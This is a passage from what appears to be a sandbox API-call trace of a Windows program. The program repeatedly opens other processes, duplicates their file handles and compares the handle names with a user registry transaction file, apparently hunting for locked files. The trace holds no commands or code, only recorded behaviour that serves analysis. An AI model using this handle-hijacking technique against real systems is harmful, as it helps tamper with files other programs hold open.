lpThreadId=0x0) returned 0x670 [0154.753] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.754] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.754] CloseHandle (hObject=0x670) returned 1 [0154.754] _wcsicmp (_Str1="\\INDEX.BTR", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.754] CloseHandle (hObject=0x680) returned 1 [0154.754] CloseHandle (hObject=0x62c) returned 1 [0154.754] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.754] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.755] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.755] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.755] CloseHandle (hObject=0x670) returned 1 [0154.755] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.755] CloseHandle (hObject=0x680) returned 1 [0154.756] CloseHandle (hObject=0x62c) returned 1 [0154.756] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.756] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa2c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.756] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.757] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.757] CloseHandle (hObject=0x670) returned 1 [0154.757] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0154.757] CloseHandle (hObject=0x680) returned 1 [0154.757] CloseHandle (hObject=0x62c) returned 1 [0154.757] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.757] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa70, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.758] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.758] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.759] CloseHandle (hObject=0x670) returned 1 [0154.759] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.759] CloseHandle (hObject=0x680) returned 1 [0154.759] CloseHandle (hObject=0x62c) returned 1 [0154.759] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.759] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa78, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.759] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.760] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.760] CloseHandle (hObject=0x670) returned 1 [0154.760] _wcsicmp (_Str1="\\srvsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.760] CloseHandle (hObject=0x680) returned 1 [0154.760] CloseHandle (hObject=0x62c) returned 1 [0154.760] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.760] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xba0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.761] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.761] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.761] CloseHandle (hObject=0x670) returned 1 [0154.762] _wcsicmp (_Str1="\\FirewallAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0154.762] CloseHandle (hObject=0x680) returned 1 [0154.762] CloseHandle (hObject=0x62c) returned 1 [0154.762] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.762] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.763] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.763] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.763] CloseHandle (hObject=0x670) returned 1 [0154.763] _wcsicmp (_Str1="\\CIMV2SCM EVENT PROVIDER", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.763] CloseHandle (hObject=0x680) returned 1 [0154.763] CloseHandle (hObject=0x62c) returned 1 [0154.763] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.763] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.764] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.765] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.765] CloseHandle (hObject=0x670) returned 1 [0154.765] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.765] CloseHandle (hObject=0x680) returned 1 [0154.765] CloseHandle (hObject=0x62c) returned 1 [0154.765] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.765] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1114, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.766] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.766] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.766] CloseHandle (hObject=0x670) returned 1 [0154.767] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.767] CloseHandle (hObject=0x680) returned 1 [0154.767] CloseHandle (hObject=0x62c) returned 1 [0154.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.767] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.767] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.768] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.768] CloseHandle (hObject=0x670) returned 1 [0154.768] CloseHandle (hObject=0x680) returned 1 [0154.768] CloseHandle (hObject=0x62c) returned 1 [0154.768] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.768] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.769] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.769] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.770] CloseHandle (hObject=0x670) returned 1 [0154.770] CloseHandle (hObject=0x680) returned 1 [0154.770] CloseHandle (hObject=0x62c) returned 1 [0154.770] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.770] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.770] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.771] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.771] CloseHandle (hObject=0x670) returned 1 [0154.771] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.771] CloseHandle (hObject=0x680) returned 1 [0154.771] CloseHandle (hObject=0x62c) returned 1 [0154.771] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0154.771] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.771] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.772] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.773] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.773] CloseHandle (hObject=0x670) returned 1 [0154.773] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.773] CloseHandle (hObject=0x680) returned 1 [0154.773] CloseHandle (hObject=0x62c) returned 1 [0154.773] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.773] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.774] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.774] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.774] CloseHandle (hObject=0x670) returned 1 [0154.774] CloseHandle (hObject=0x680) returned 1 [0154.774] CloseHandle (hObject=0x62c) returned 1 [0154.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.775] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.775] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.776] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.776] CloseHandle (hObject=0x670) returned 1 [0154.776] CloseHandle (hObject=0x680) returned 1 [0154.776] CloseHandle (hObject=0x62c) returned 1 [0154.776] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.776] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.777] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.777] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.777] CloseHandle (hObject=0x670) returned 1 [0154.778] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.778] CloseHandle (hObject=0x680) returned 1 [0154.778] CloseHandle (hObject=0x62c) returned 1 [0154.778] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.778] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.778] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.779] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.779] CloseHandle (hObject=0x670) returned 1 [0154.779] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.779] CloseHandle (hObject=0x680) returned 1 [0154.779] CloseHandle (hObject=0x62c) returned 1 [0154.779] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x62c [0154.779] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.780] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.781] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.781] CloseHandle (hObject=0x670) returned 1 [0154.781] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0154.781] CloseHandle (hObject=0x680) returned 1 [0154.781] CloseHandle (hObject=0x62c) returned 1 [0154.781] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.781] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.782] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.783] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.783] CloseHandle (hObject=0x670) returned 1 [0154.783] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.783] CloseHandle (hObject=0x680) returned 1 [0154.783] CloseHandle (hObject=0x62c) returned 1 [0154.783] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.783] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.783] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.784] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.784] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.784] CloseHandle (hObject=0x670) returned 1 [0154.785] CloseHandle (hObject=0x680) returned 1 [0154.785] CloseHandle (hObject=0x62c) returned 1 [0154.785] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.785] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.785] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.786] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.786] CloseHandle (hObject=0x670) returned 1 [0154.786] CloseHandle (hObject=0x680) returned 1 [0154.786] CloseHandle (hObject=0x62c) returned 1 [0154.786] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.786] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.787] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.788] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.788] CloseHandle (hObject=0x670) returned 1 [0154.788] _wcsicmp (_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0154.788] CloseHandle (hObject=0x680) returned 1 [0154.788] CloseHandle (hObject=0x62c) returned 1 [0154.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.788] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.789] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.789] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.789] CloseHandle (hObject=0x670) returned 1 [0154.789] CloseHandle (hObject=0x680) returned 1 [0154.789] CloseHandle (hObject=0x62c) returned 1 [0154.789] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.789] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.790] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.791] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.791] CloseHandle (hObject=0x670) returned 1 [0154.791] CloseHandle (hObject=0x680) returned 1 [0154.791] CloseHandle (hObject=0x62c) returned 1 [0154.791] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.791] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.791] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.794] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.794] CloseHandle (hObject=0x670) returned 1 [0154.794] CloseHandle (hObject=0x680) returned 1 [0154.794] CloseHandle (hObject=0x62c) returned 1 [0154.794] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.794] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.795] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.795] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.795] CloseHandle (hObject=0x670) returned 1 [0154.795] CloseHandle (hObject=0x680) returned 1 [0154.796] CloseHandle (hObject=0x62c) returned 1 [0154.796] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.796] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.796] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.797] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.797] CloseHandle (hObject=0x670) returned 1 [0154.797] CloseHandle (hObject=0x680) returned 1 [0154.797] CloseHandle (hObject=0x62c) returned 1 [0154.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0154.797] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, 